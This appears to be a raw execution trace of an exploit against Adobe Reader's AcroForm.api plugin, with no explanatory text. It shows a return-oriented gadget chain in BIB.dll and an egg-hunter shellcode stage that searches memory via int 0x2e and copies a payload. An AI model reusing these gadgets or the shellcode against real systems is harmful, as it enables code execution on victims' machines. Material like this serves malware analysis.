0x20C9CD32::AcroForm.api 2D FF 00 00 00 sub eax, 0xff
0x20C9CD37::AcroForm.api 74 3F jz 0x20c9cd78
0x20C9CD39::AcroForm.api 83 E8 03 sub eax, 0x3
0x20C9CD3C::AcroForm.api 0F 84 FD 01 00 00 jz 0x20c9cf3f
0x20C9CD42::AcroForm.api 83 E8 0F sub eax, 0xf
0x20C9CD45::AcroForm.api 0F 84 8A 01 00 00 jz 0x20c9ced5
0x20C9CD4B::AcroForm.api 83 E8 06 sub eax, 0x6
0x20C9CD4E::AcroForm.api 0F 85 DD 01 00 00 jnz 0x20c9cf31
0x20C9CF31::AcroForm.api 8B C7 mov eax, edi
0x20C9CF33::AcroForm.api 8B CB mov ecx, ebx
0x20C9CF35::AcroForm.api E8 87 ED FF FF call 0x20c9bcc1 -> .text
0x20C9CF3A::AcroForm.api E9 BF 00 00 00 jmp 0x20c9cffe
0x20C6EAA9::AcroForm.api 8B 45 10 mov eax, dword ptr [ebp+0x10]
0x20C6EAAC::AcroForm.api 66 8B 00 mov ax, word ptr [eax]
0x20C6EAAF::AcroForm.api 66 89 47 32 mov word ptr [edi+0x32], ax
0x20C6EAB3::AcroForm.api E9 AC 05 00 00 jmp 0x20c6f064
0x20C9CED5::AcroForm.api 8D 83 B0 00 00 00 lea eax, ptr [ebx+0xb0]
0x20C9CEDB::AcroForm.api E9 7A FE FF FF jmp 0x20c9cd5a
0x20C9CD5A::AcroForm.api FF B3 AC 00 00 00 push dword ptr [ebx+0xac]
0x20C9CD60::AcroForm.api 8B 7D F0 mov edi, dword ptr [ebp-0x10]
0x20C9CD63::AcroForm.api 8B CB mov ecx, ebx
0x20C9CD65::AcroForm.api E8 92 F5 FF FF call 0x20c9c2fc -> .text
0x20C9C2FC::AcroForm.api 55 push ebp
0x20C9C2FD::AcroForm.api 8B EC mov ebp, esp
0x20C9C2FF::AcroForm.api 51 push ecx
0x20C9C300::AcroForm.api 51 push ecx
0x20C9C301::AcroForm.api 8B 55 08 mov edx, dword ptr [ebp+0x8]
0x20C9C304::AcroForm.api 53 push ebx
0x20C9C305::AcroForm.api 56 push esi
0x20C9C306::AcroForm.api 8B D8 mov ebx, eax
0x20C9C308::AcroForm.api 8B F1 mov esi, ecx
0x20C9C30A::AcroForm.api 8B C7 mov eax, edi
0x20C9C30C::AcroForm.api E8 2F F3 FF FF call 0x20c9b640 -> .text
0x20C9C311::AcroForm.api 83 3B 00 cmp dword ptr [ebx], 0x0
0x20C9C314::AcroForm.api 75 20 jnz 0x20c9c336
0x20C9C316::AcroForm.api 68 B4 C3 D9 20 push 0x20d9c3b4
0x20C9C31B::AcroForm.api 6A 04 push 0x4
0x20C9C31D::AcroForm.api FF 75 08 push dword ptr [ebp+0x8]
0x20C9C320::AcroForm.api 56 push esi
0x20C9C321::AcroForm.api E8 6C 6B FD FF call 0x20c72e92 -> .text
0x20C9C326::AcroForm.api 83 C4 10 add esp, 0x10
0x20C9C329::AcroForm.api 85 C0 test eax, eax
0x20C9C32B::AcroForm.api 89 03 mov dword ptr [ebx], eax
0x20C9C32D::AcroForm.api 75 07 jnz 0x20c9c336
0x20C9C32F::AcroForm.api 33 C0 xor eax, eax
0x20C9C331::AcroForm.api E9 D4 00 00 00 jmp 0x20c9c40a
0x20C9C336::AcroForm.api 8B 45 08 mov eax, dword ptr [ebp+0x8]
0x20C9C339::AcroForm.api 8B 1B mov ebx, dword ptr [ebx]
0x20C9C33B::AcroForm.api C1 E0 02 shl eax, 0x2
0x20C9C33E::AcroForm.api 50 push eax
0x20C9C33F::AcroForm.api 6A 00 push 0x0
0x20C9C341::AcroForm.api 53 push ebx
0x20C9C342::AcroForm.api 89 5D FC mov dword ptr [ebp-0x4], ebx
0x20C9C345::AcroForm.api E8 76 B5 FF FF call 0x20c978c0 -> .text
0x20C9C34A::AcroForm.api 83 C4 0C add esp, 0xc
0x20C9C34D::AcroForm.api 66 83 7F 02 03 cmp word ptr [edi+0x2], 0x3
0x20C9C352::AcroForm.api 75 47 jnz 0x20c9c39b
0x20C9C354::AcroForm.api 68 A0 C3 D9 20 push 0x20d9c3a0
0x20C9C359::AcroForm.api 6A 02 push 0x2
0x20C9C35B::AcroForm.api FF 77 04 push dword ptr [edi+0x4]
0x20C9C35E::AcroForm.api 56 push esi
0x20C9C35F::AcroForm.api E8 2E 6B FD FF call 0x20c72e92 -> .text
0x20C9C39B::AcroForm.api 8B 47 04 mov eax, dword ptr [edi+0x4]
0x20C9C39E::AcroForm.api 39 45 08 cmp dword ptr [ebp+0x8], eax
0x20C9C3A1::AcroForm.api 74 58 jz 0x20c9c3fb
0x20C9C3A3::AcroForm.api 68 A0 C3 D9 20 push 0x20d9c3a0
0x20C9C3A8::AcroForm.api 6A 04 push 0x4
0x20C9C3AA::AcroForm.api 50 push eax
0x20C9C3AB::AcroForm.api 56 push esi
0x20C9C3AC::AcroForm.api E8 E1 6A FD FF call 0x20c72e92 -> .text
0x20C9C3FB::AcroForm.api 8B C3 mov eax, ebx
0x20C9C3FD::AcroForm.api 8B CF mov ecx, edi
0x20C9C3FF::AcroForm.api 8B DE mov ebx, esi
0x20C9C401::AcroForm.api E8 4F F6 FF FF call 0x20c9ba55 -> .text
0x20C9BA55::AcroForm.api 56 push esi
0x20C9BA56::AcroForm.api 8B F1 mov esi, ecx
0x20C9BA58::AcroForm.api 83 7E 04 01 cmp dword ptr [esi+0x4], 0x1
0x20C9BA5C::AcroForm.api 75 0A jnz 0x20c9ba68
0x20C9BA5E::AcroForm.api 8B 4E 08 mov ecx, dword ptr [esi+0x8]
0x20C9BA61::AcroForm.api 89 08 mov dword ptr [eax], ecx
0x20C9BA63::AcroForm.api 33 C0 xor eax, eax
0x20C9BA65::AcroForm.api 40 inc eax
0x20C9BA66::AcroForm.api 5E pop esi
0x20C9BA67::AcroForm.api C3 ret
0x20C9C406::AcroForm.api 8B F0 mov esi, eax
0x20C9C408::AcroForm.api 8B C6 mov eax, esi
0x20C9C40A::AcroForm.api 5E pop esi
0x20C9C40B::AcroForm.api 5B pop ebx
0x20C9C40C::AcroForm.api C9 leave
0x20C9C40D::AcroForm.api C3 ret
0x20C9CD6A::AcroForm.api 85 C0 test eax, eax
0x20C9CD6C::AcroForm.api 59 pop ecx
0x20C9CD6D::AcroForm.api 0F 84 DC F9 FF FF jz 0x20c9c74f
0x20C9CD73::AcroForm.api E9 83 02 00 00 jmp 0x20c9cffb
0x20C9CFFB::AcroForm.api 8B 7D F0 mov edi, dword ptr [ebp-0x10]
0x20C9CFFE::AcroForm.api FF 4D EC dec dword ptr [ebp-0x14]
0x20C9D001::AcroForm.api 83 C7 0C add edi, 0xc
0x20C9D004::AcroForm.api 83 7D EC 00 cmp dword ptr [ebp-0x14], 0x0
0x20C9D008::AcroForm.api 89 7D F0 mov dword ptr [ebp-0x10], edi
0x20C9D00B::AcroForm.api 0F 8F E5 FC FF FF jnle 0x20c9ccf6
0x20C9D011::AcroForm.api 66 83 7B 52 03 cmp word ptr [ebx+0x52], 0x3
0x20C9D016::AcroForm.api 75 13 jnz 0x20c9d02b
0x20C9D018::AcroForm.api F7 43 20 00 00 00 04 test dword ptr [ebx+0x20], 0x4000000
0x20C9D01F::AcroForm.api 75 0A jnz 0x20c9d02b
0x20C9CD54::AcroForm.api 8D 83 B4 00 00 00 lea eax, ptr [ebx+0xb4]
0x20C9CD5A::AcroForm.api FF B3 AC 00 00 00 push dword ptr [ebx+0xac]
0x20C9CD60::AcroForm.api 8B 7D F0 mov edi, dword ptr [ebp-0x10]
0x20C9CD63::AcroForm.api 8B CB mov ecx, ebx
0x20C9CD65::AcroForm.api E8 92 F5 FF FF call 0x20c9c2fc -> .text
0x20C9CEA7::AcroForm.api 81 FE 55 01 00 00 cmp esi, 0x155
0x20C9CEAD::AcroForm.api 7F 66 jnle 0x20c9cf15
0x20C9CEAF::AcroForm.api 81 FE 54 01 00 00 cmp esi, 0x154
0x20C9CEB5::AcroForm.api 7D 29 jnl 0x20c9cee0
0x20C9CEB7::AcroForm.api 8B C6 mov eax, esi
0x20C9CEB9::AcroForm.api 2D 44 01 00 00 sub eax, 0x144
0x20C9CEBE::AcroForm.api 74 15 jz 0x20c9ced5
0x20C9CEC0::AcroForm.api 48 dec eax
0x20C9CEC1::AcroForm.api 0F 84 8D FE FF FF jz 0x20c9cd54
0x20C9CEC7::AcroForm.api 83 E8 0B sub eax, 0xb
0x20C9CECA::AcroForm.api 0F 84 21 01 00 00 jz 0x20c9cff1
0x20C9CED0::AcroForm.api 83 E8 03 sub eax, 0x3
0x20C9CED3::AcroForm.api EB 5A jmp 0x20c9cf2f
0x20C9CFF1::AcroForm.api 8B 75 F0 mov esi, dword ptr [ebp-0x10]
0x20C9CFF4::AcroForm.api 8B FB mov edi, ebx
0x20C9CFF6::AcroForm.api E8 F3 E9 FF FF call 0x20c9b9ee -> .text
0x20C9B9EE::AcroForm.api 55 push ebp
0x20C9B9EF::AcroForm.api 8B EC mov ebp, esp
0x20C9B9F1::AcroForm.api 51 push ecx
0x20C9B9F2::AcroForm.api 0F B7 46 02 movzx eax, word ptr [esi+0x2]
0x20C9B9F6::AcroForm.api 48 dec eax
0x20C9B9F7::AcroForm.api 74 28 jz 0x20c9ba21
0x20C9B9F9::AcroForm.api 48 dec eax
0x20C9B9FA::AcroForm.api 48 dec eax
0x20C9B9FB::AcroForm.api 74 09 jz 0x20c9ba06
0x20C9B9FD::AcroForm.api 83 E8 03 sub eax, 0x3
0x20C9BA00::AcroForm.api 74 1F jz 0x20c9ba21
0x20C9BA06::AcroForm.api 8D 45 FC lea eax, ptr [ebp-0x4]
0x20C9BA09::AcroForm.api 8B CE mov ecx, esi
0x20C9BA0B::AcroForm.api 8B D7 mov edx, edi
0x20C9BA0D::AcroForm.api E8 85 FF FF FF call 0x20c9b997 -> .text
0x20C9B997::AcroForm.api 53 push ebx
0x20C9B998::AcroForm.api 56 push esi
0x20C9B999::AcroForm.api 8B F1 mov esi, ecx
0x20C9B99B::AcroForm.api 8B 4E 04 mov ecx, dword ptr [esi+0x4]
0x20C9B99E::AcroForm.api 83 F9 02 cmp ecx, 0x2
0x20C9B9A1::AcroForm.api 8B DA mov ebx, edx
0x20C9B9A3::AcroForm.api 77 39 jnbe 0x20c9b9de
0x20C9B9A5::AcroForm.api 66 81 BB E8 00 00 00 4D 4D cmp word ptr [ebx+0xe8], 0x4d4d
0x20C9B9AE::AcroForm.api 75 14 jnz 0x20c9b9c4
0x20C9B9B0::AcroForm.api 49 dec ecx
0x20C9B9B1::AcroForm.api 74 0B jz 0x20c9b9be
0x20C9B9DE::AcroForm.api 50 push eax
0x20C9B9DF::AcroForm.api E8 B8 FC FF FF call 0x20c9b69c -> .text
0x20C9B69C::AcroForm.api 55 push ebp
0x20C9B69D::AcroForm.api 8B EC mov ebp, esp
0x20C9B69F::AcroForm.api 0F B7 46 02 movzx eax, word ptr [esi+0x2]
0x20C9B6A3::AcroForm.api 57 push edi
0x20C9B6A4::AcroForm.api 50 push eax
0x20C9B6A5::AcroForm.api E8 15 F9 FF FF call 0x20c9afbf -> .text
0x20C9AFBF::AcroForm.api 8B 44 24 04 mov eax, dword ptr [esp+0x4]
0x20C9AFC3::AcroForm.api 83 F8 0D cmp eax, 0xd
0x20C9AFC6::AcroForm.api 77 1E jnbe 0x20c9afe6
0x20C9AFC8::AcroForm.api 0F B6 80 FB AF C9 20 movzx eax, byte ptr [eax+0x20c9affb]
0x20C9AFCF::AcroForm.api FF 24 85 EB AF C9 20 jmp dword ptr [eax*4+0x20c9afeb]
0x20C9AFDA::AcroForm.api 6A 02 push 0x2
0x20C9AFDC::AcroForm.api 58 pop eax
0x20C9AFDD::AcroForm.api C3 ret
0x20C9B6AA::AcroForm.api 59 pop ecx
0x20C9B6AB::AcroForm.api 8B C8 mov ecx, eax
0x20C9B6AD::AcroForm.api 8B 46 04 mov eax, dword ptr [esi+0x4]
0x20C9B6B0::AcroForm.api 8B F8 mov edi, eax
0x20C9B6B2::AcroForm.api 0F AF F9 imul edi, ecx
0x20C9B6B5::AcroForm.api 85 C0 test eax, eax
0x20C9B6B7::AcroForm.api 74 46 jz 0x20c9b6ff
0x20C9B6B9::AcroForm.api 85 C9 test ecx, ecx
0x20C9B6BB::AcroForm.api 74 42 jz 0x20c9b6ff
0x20C9B6BD::AcroForm.api 8B C7 mov eax, edi
0x20C9B6BF::AcroForm.api 99 cdq
0x20C9B6C0::AcroForm.api F7 F9 idiv ecx
0x20C9B6C2::AcroForm.api 3B 46 04 cmp eax, dword ptr [esi+0x4]
0x20C9B6C5::AcroForm.api 75 38 jnz 0x20c9b6ff
0x20C9B6C7::AcroForm.api 66 F7 43 0C 00 08 test word ptr [ebx+0xc], 0x800
0x20C9B6CD::AcroForm.api 75 57 jnz 0x20c9b726
0x20C9B6CF::AcroForm.api 6A 00 push 0x0
0x20C9B6D1::AcroForm.api FF 76 08 push dword ptr [esi+0x8]
0x20C9B6D4::AcroForm.api FF B3 94 01 00 00 push dword ptr [ebx+0x194]
0x20C9B6DA::AcroForm.api FF 93 A0 01 00 00 call dword ptr [ebx+0x1a0]
0x20C1231F::AcroForm.api 8B 4E 08 mov ecx, dword ptr [esi+0x8]
0x20C12322::AcroForm.api 8D 45 E0 lea eax, ptr [ebp-0x20]
0x20C12325::AcroForm.api 50 push eax
0x20C12326::AcroForm.api E8 CB 42 DB FF call 0x209c65f6 -> .text
0x2080277F::AcroForm.api 8B 01 mov eax, dword ptr [ecx]
0x20802781::AcroForm.api C3 ret
0x209C660F::AcroForm.api 03 46 24 add eax, dword ptr [esi+0x24]
0x209C6612::AcroForm.api 8B 4C 24 0C mov ecx, dword ptr [esp+0xc]
0x209C6616::AcroForm.api 50 push eax
0x209C6617::AcroForm.api E8 4F 44 00 00 call 0x209caa6b -> .text
0x209C661C::AcroForm.api EB 11 jmp 0x209c662f
0x209C662F::AcroForm.api 8B 44 24 08 mov eax, dword ptr [esp+0x8]
0x209C6633::AcroForm.api 5E pop esi
0x209C6634::AcroForm.api C2 04 00 ret 0x4
0x20C1232B::AcroForm.api 8B 08 mov ecx, dword ptr [eax]
0x20C1232D::AcroForm.api 89 4D F8 mov dword ptr [ebp-0x8], ecx
0x20C12330::AcroForm.api 8B 40 04 mov eax, dword ptr [eax+0x4]
0x20C12333::AcroForm.api 8D 4D F8 lea ecx, ptr [ebp-0x8]
0x20C12336::AcroForm.api 89 45 FC mov dword ptr [ebp-0x4], eax
0x20C12339::AcroForm.api E8 41 04 BF FF call 0x2080277f -> PlugInMain
0x20C9B6E0::AcroForm.api 83 C4 0C add esp, 0xc
0x20C9B6E3::AcroForm.api 3B 46 08 cmp eax, dword ptr [esi+0x8]
0x20C9B6E6::AcroForm.api 75 17 jnz 0x20c9b6ff
0x20C9B6E8::AcroForm.api 57 push edi
0x20C9B6E9::AcroForm.api FF 75 08 push dword ptr [ebp+0x8]
0x20C9B6EC::AcroForm.api FF B3 94 01 00 00 push dword ptr [ebx+0x194]
0x20C9B6F2::AcroForm.api FF 93 98 01 00 00 call dword ptr [ebx+0x198]
0x20C32564::AcroForm.api 01 7E 28 add dword ptr [esi+0x28], edi
0x20C32567::AcroForm.api 83 C4 0C add esp, 0xc
0x20C3256A::AcroForm.api 8B C7 mov eax, edi
0x20C3256C::AcroForm.api 5F pop edi
0x20C3256D::AcroForm.api 5E pop esi
0x20C3256E::AcroForm.api C2 08 00 ret 0x8
0x20C9B6F8::AcroForm.api 83 C4 0C add esp, 0xc
0x20C9B6FB::AcroForm.api 3B C7 cmp eax, edi
0x20C9B6FD::AcroForm.api 74 55 jz 0x20c9b754
0x20C9B6FF::AcroForm.api 0F B7 06 movzx eax, word ptr [esi]
0x20C9B702::AcroForm.api 50 push eax
0x20C9B703::AcroForm.api 53 push ebx
0x20C9B704::AcroForm.api E8 55 FA FF FF call 0x20c9b15e -> .text
0x20C9B709::AcroForm.api FF 70 10 push dword ptr [eax+0x10]
0x20C9B70C::AcroForm.api 68 AC C2 D9 20 push 0x20d9c2ac
0x20C9B711::AcroForm.api FF 33 push dword ptr [ebx]
0x20C9B713::AcroForm.api FF B3 94 01 00 00 push dword ptr [ebx+0x194]
0x20C9B719::AcroForm.api E8 1C 72 FD FF call 0x20c7293a -> .text
0x20C7293A::AcroForm.api 55 push ebp
0x20C7293B::AcroForm.api 8B EC mov ebp, esp
0x20C7293D::AcroForm.api A1 14 C9 03 21 mov eax, dword ptr [0x2103c914]
0x20C72942::AcroForm.api 85 C0 test eax, eax
0x20C72944::AcroForm.api 74 0F jz 0x20c72955
0x20C72946::AcroForm.api 8D 4D 14 lea ecx, ptr [ebp+0x14]
0x20C72949::AcroForm.api 51 push ecx
0x20C7294A::AcroForm.api FF 75 10 push dword ptr [ebp+0x10]
0x20C7294D::AcroForm.api FF 75 0C push dword ptr [ebp+0xc]
0x20C72950::AcroForm.api FF D0 call eax
0x20C7285F::AcroForm.api 55 push ebp
0x20C72860::AcroForm.api 8B EC mov ebp, esp
0x20C72862::AcroForm.api 83 EC 10 sub esp, 0x10
0x20C72865::AcroForm.api FF 75 08 push dword ptr [ebp+0x8]
0x20C72868::AcroForm.api FF 15 74 A4 D2 20 call dword ptr [0x20d2a474]
0x20C7286E::AcroForm.api FF 75 0C push dword ptr [ebp+0xc]
0x20C72871::AcroForm.api 89 45 F0 mov dword ptr [ebp-0x10], eax
0x20C72874::AcroForm.api E8 BE C0 02 00 call 0x20c9e937 -> .text
0x20C9E964::AcroForm.api FF 35 78 CA 03 21 push dword ptr [0x2103ca78]
0x20C9E96A::AcroForm.api E8 ED 2C B6 FF call 0x2080165c -> unnamedImageEntryPoint
0x20C9E96F::AcroForm.api 3B E8 cmp ebp, eax
0x20C9E971::AcroForm.api 59 pop ecx
0x20C9E972::AcroForm.api 76 04 jbe 0x20c9e978
0x20C9E974::AcroForm.api 6A 58 push 0x58
0x20C9E976::AcroForm.api EB 12 jmp 0x20c9e98a
0x20C9E978::AcroForm.api FF 35 C8 C9 03 21 push dword ptr [0x2103c9c8]
0x20C9E97E::AcroForm.api E8 D9 2C B6 FF call 0x2080165c -> unnamedImageEntryPoint
0x20C9E983::AcroForm.api 3B E8 cmp ebp, eax
0x20C9E985::AcroForm.api 59 pop ecx
0x20C9E986::AcroForm.api 76 03 jbe 0x20c9e98b
0x20C9E988::AcroForm.api 6A 2C push 0x2c
0x20C9E98A::AcroForm.api 5E pop esi
0x20C9E98B::AcroForm.api BB B1 00 00 00 mov ebx, 0xb1
0x20C9E990::AcroForm.api FF 34 B5 18 C9 03 21 push dword ptr [esi*4+0x2103c918]
0x20C9E997::AcroForm.api E8 C0 2C B6 FF call 0x2080165c -> unnamedImageEntryPoint
0x20C9E9D6::AcroForm.api 89 74 24 10 mov dword ptr [esp+0x10], esi
0x20C9E9DA::AcroForm.api 3B F3 cmp esi, ebx
0x20C9E9DC::AcroForm.api 5F pop edi
0x20C9E9DD::AcroForm.api 73 17 jnb 0x20c9e9f6
0x20C9E9DF::AcroForm.api FF 34 B5 18 C9 03 21 push dword ptr [esi*4+0x2103c918]
0x20C9E9E6::AcroForm.api E8 71 2C B6 FF call 0x2080165c -> unnamedImageEntryPoint
0x20C9E9FF::AcroForm.api 5E pop esi
0x20C9EA00::AcroForm.api 5D pop ebp
0x20C9EA01::AcroForm.api 5B pop ebx
0x20C9EA02::AcroForm.api 59 pop ecx
0x20C9EA03::AcroForm.api C3 ret
0x20C72879::AcroForm.api 05 4E 46 00 00 add eax, 0x464e
0x20C7287E::AcroForm.api 89 45 F8 mov dword ptr [ebp-0x8], eax
0x20C72881::AcroForm.api 8B 45 10 mov eax, dword ptr [ebp+0x10]
0x20C72884::AcroForm.api 59 pop ecx
0x20C72885::AcroForm.api 59 pop ecx
0x20C72886::AcroForm.api C7 45 FC 01 00 00 00 mov dword ptr [ebp-0x4], 0x1
0x20C7288D::AcroForm.api 89 45 F4 mov dword ptr [ebp-0xc], eax
0x20C72890::AcroForm.api E8 71 FF FF FF call 0x20c72806 -> .text
0x20C72841::AcroForm.api B8 54 8E 14 21 mov eax, 0x21148e54
0x20C72846::AcroForm.api C3 ret
0x20C72895::AcroForm.api 8D 4D F0 lea ecx, ptr [ebp-0x10]
0x20C72898::AcroForm.api 51 push ecx
0x20C72899::AcroForm.api 8B C8 mov ecx, eax
0x20C7289B::AcroForm.api E8 18 82 FE FF call 0x20c5aab8 -> .text
0x20C5AA81::AcroForm.api 5B pop ebx
0x20C5AA82::AcroForm.api 5D pop ebp
0x20C5AA83::AcroForm.api C2 08 00 ret 0x8
0x20C728A0::AcroForm.api C9 leave
0x20C728A1::AcroForm.api C3 ret
0x20C72952::AcroForm.api 83 C4 0C add esp, 0xc
0x20C72955::AcroForm.api A1 70 8E 14 21 mov eax, dword ptr [0x21148e70]
0x20C7295A::AcroForm.api 85 C0 test eax, eax
0x20C7295C::AcroForm.api 74 12 jz 0x20c72970
0x20C7295E::AcroForm.api 8D 4D 14 lea ecx, ptr [ebp+0x14]
0x20C72961::AcroForm.api 51 push ecx
0x20C72962::AcroForm.api FF 75 10 push dword ptr [ebp+0x10]
0x20C72965::AcroForm.api FF 75 0C push dword ptr [ebp+0xc]
0x20C72968::AcroForm.api FF 75 08 push dword ptr [ebp+0x8]
0x20C7296B::AcroForm.api FF D0 call eax
0x20C72970::AcroForm.api 5D pop ebp
0x20C72971::AcroForm.api C3 ret
0x20C9B71E::AcroForm.api 83 C4 18 add esp, 0x18
0x20C9B721::AcroForm.api 33 C0 xor eax, eax
0x20C9B723::AcroForm.api 5F pop edi
0x20C9B724::AcroForm.api 5D pop ebp
0x20C9B725::AcroForm.api C3 ret
0x20C9B9E4::AcroForm.api F7 D8 neg eax
0x20C9B9E6::AcroForm.api 1B C0 sbb eax, eax
0x20C9B9E8::AcroForm.api 59 pop ecx
0x20C9B9E9::AcroForm.api F7 D8 neg eax
0x20C9B9EB::AcroForm.api 5E pop esi
0x20C9B9EC::AcroForm.api 5B pop ebx
0x20C9B9ED::AcroForm.api C3 ret
0x20C9BA12::AcroForm.api 85 C0 test eax, eax
0x20C9BA14::AcroForm.api 74 3B jz 0x20c9ba51
0x20C9BA16::AcroForm.api 0F B7 45 FE movzx eax, word ptr [ebp-0x2]
0x20C9BA1A::AcroForm.api 50 push eax
0x20C9BA1B::AcroForm.api 0F B7 45 FC movzx eax, word ptr [ebp-0x4]
0x20C9BA1F::AcroForm.api EB 19 jmp 0x20c9ba3a
0x20C9BA51::AcroForm.api 33 C0 xor eax, eax
0x20C9BA53::AcroForm.api C9 leave
0x20C9BA54::AcroForm.api C3 ret
0x070072F7::BIB.dll 58 pop eax
0x070072F8::BIB.dll C3 ret
0x070015BB::BIB.dll 59 pop ecx
0x070015BC::BIB.dll C3 ret
0x0700154D::BIB.dll 89 08 mov dword ptr [eax], ecx
0x0700154F::BIB.dll C3 ret
0x07007FB2::BIB.dll 8B 01 mov eax, dword ptr [ecx]
0x07007FB4::BIB.dll C3 ret
0x0700A8AC::BIB.dll 89 01 mov dword ptr [ecx], eax
0x0700A8AE::BIB.dll 33 C0 xor eax, eax
0x0700A8B0::BIB.dll C3 ret
0x070072F7::BIB.dll 58 pop eax
0x070072F8::BIB.dll C3 ret
0x070052E2::BIB.dll FF 10 call dword ptr [eax]
0x070052E4::BIB.dll C3 ret
0x07005C54::BIB.dll 5E pop esi
0x07005C55::BIB.dll 83 C4 14 add esp, 0x14
0x07005C58::BIB.dll C3 ret
0x0700D731::BIB.dll 8B 45 DC mov eax, dword ptr [ebp-0x24]
0x0700D734::BIB.dll C3 ret
0x0700A722::BIB.dll 83 C0 04 add eax, 0x4
0x0700A725::BIB.dll C3 ret
0x0700D731::BIB.dll 8B 45 DC mov eax, dword ptr [ebp-0x24]
0x0700D734::BIB.dll C3 ret
0x0700112F::BIB.dll FF D0 call eax

Shellcode:
eax = 91c0000 ebx = 17d4b8 ecx = 90ffffff edx = 12f1194 esi = ffffffff edi = 17d4b8
eip = 91c0000 esp = 12c9ec ebp = 10124 eflags = 200202
0x091C0000:: 5A pop edx
eax = 91c0000 ebx = 17d4b8 ecx = 90ffffff edx = 7001131 esi = ffffffff edi = 17d4b8
eip = 91c0001 esp = 12c9f0 ebp = 10124 eflags = 200202
0x091C0001:: 52 push edx
eax = 91c0000 ebx = 17d4b8 ecx = 90ffffff edx = 7001131 esi = ffffffff edi = 17d4b8
eip = 91c0002 esp = 12c9ec ebp = 10124 eflags = 200202
0x091C0002:: 6A 02 push 0x2
eax = 91c0000 ebx = 17d4b8 ecx = 90ffffff edx = 7001131 esi = ffffffff edi = 17d4b8
eip = 91c0004 esp = 12c9e8 ebp = 10124 eflags = 200202
0x091C0004:: 58 pop eax
eax = 2 ebx = 17d4b8 ecx = 90ffffff edx = 7001131 esi = ffffffff edi = 17d4b8
eip = 91c0005 esp = 12c9ec ebp = 10124 eflags = 200202
0x091C0005:: CD 2E int 0x2e
eax = c000005c ebx = 17d4b8 ecx = 12c9ec edx = 12f1194 esi = ffffffff edi = 17d4b8
eip = 91c0007 esp = 12c9ec ebp = 10124 eflags = 200202
0x091C0007:: 3C 05 cmp al, 0x5
eax = c000005c ebx = 17d4b8 ecx = 12c9ec edx = 12f1194 esi = ffffffff edi = 17d4b8
eip = 91c0009 esp = 12c9ec ebp = 10124 eflags = 200202
0x091C0009:: 5A pop edx
eax = c000005c ebx = 17d4b8 ecx = 12c9ec edx = 7001131 esi = ffffffff edi = 17d4b8
eip = 91c000a esp = 12c9f0 ebp = 10124 eflags = 200202
0x091C000A:: 74 F4 jz 0x91c0000
eax = c000005c ebx = 17d4b8 ecx = 12c9ec edx = 7001131 esi = ffffffff edi = 17d4b8
eip = 91c000c esp = 12c9f0 ebp = 10124 eflags = 200202
0x091C000C:: B8 49 49 2A 00 mov eax, 0x2a4949
eax = 2a4949 ebx = 17d4b8 ecx = 12c9ec edx = 7001131 esi = ffffffff edi = 17d4b8
eip = 91c0011 esp = 12c9f0 ebp = 10124 eflags = 200202
0x091C0011:: 8B FA mov edi, edx
eax = 2a4949 ebx = 17d4b8 ecx = 12c9ec edx = 7001131 esi = ffffffff edi = 7001131
eip = 91c0013 esp = 12c9f0 ebp = 10124 eflags = 200202
0x091C0013:: AF scasd dword ptr [edi]
eax = 2a4949 ebx = 17d4b8 ecx = 12c9ec edx = 7001131 esi = ffffffff edi = 7001135
eip = 91c0014 esp = 12c9f0 ebp = 10124 eflags = 200206
0x091C0014:: 75 EA jnz 0x91c0000
eax = 2a4949 ebx = 17d4b8 ecx = 12c9ec edx = 7001131 esi = ffffffff edi = 7001135
eip = 91c0000 esp = 12c9f0 ebp = 10124 eflags = 200206
0x091C0000:: 5A pop edx
eax = 2a4949 ebx = 17d4b8 ecx = 12c9ec edx = 18 esi = ffffffff edi = 7001135
eip = 91c0001 esp = 12c9f4 ebp = 10124 eflags = 200206
0x091C0001:: 52 push edx
eax = 2a4949 ebx = 17d4b8 ecx = 12c9ec edx = 18 esi = ffffffff edi = 7001135
eip = 91c0002 esp = 12c9f0 ebp = 10124 eflags = 200206
0x091C0002:: 6A 02 push 0x2
eax = 2a4949 ebx = 17d4b8 ecx = 12c9ec edx = 18 esi = ffffffff edi = 7001135
eip = 91c0004 esp = 12c9ec ebp = 10124 eflags = 200206
0x091C0004:: 58 pop eax
eax = 2 ebx = 17d4b8 ecx = 12c9ec edx = 18 esi = ffffffff edi = 7001135
eip = 91c0005 esp = 12c9f0 ebp = 10124 eflags = 200206
0x091C0005:: CD 2E int 0x2e
eax = 2a4949 ebx = 17d4b8 ecx = 12cbec edx = 8876f18 esi = ffffffff edi = 8876f1c
eip = 91c0016 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0016:: 87 FE xchg esi, edi
eax = 2a4949 ebx = 17d4b8 ecx = 12cbec edx = 8876f18 esi = 8876f1c edi = ffffffff
eip = 91c0018 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0018:: EB 0A jmp 0x91c0024
eax = 2a4949 ebx = 17d4b8 ecx = 12cbec edx = 8876f18 esi = 8876f1c edi = ffffffff
eip = 91c0024 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0024:: E8 F1 FF FF FF call 0x91c001a ->
eax = 2a4949 ebx = 17d4b8 ecx = 12cbec edx = 8876f18 esi = 8876f1c edi = ffffffff
eip = 91c001a esp = 12cbec ebp = 10124 eflags = 200246
0x091C001A:: 5F pop edi
eax = 2a4949 ebx = 17d4b8 ecx = 12cbec edx = 8876f18 esi = 8876f1c edi = 91c0029
eip = 91c001b esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C001B:: B9 E0 03 00 00 mov ecx, 0x3e0
eax = 2a4949 ebx = 17d4b8 ecx = 3e0 edx = 8876f18 esi = 8876f1c edi = 91c0029
eip = 91c0020 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0020:: F3 A5 rep movsd dword ptr [edi], dword ptr [esi]
eax = 2a4949 ebx = 17d4b8 ecx = 3df edx = 8876f18 esi = 8876f20 edi = 91c002d
eip = 91c0020 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0020:: F3 A5 rep movsd dword ptr [edi], dword ptr [esi]
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c0022 esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C0022:: EB 09 jmp 0x91c002d
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
eip = 91c002d esp = 12cbf0 ebp = 10124 eflags = 200246
0x091C002D:: 90 nop
eax = 2a4949 ebx = 17d4b8 ecx = 0 edx = 8876f18 esi = 8877e9c edi = 91c0fa9
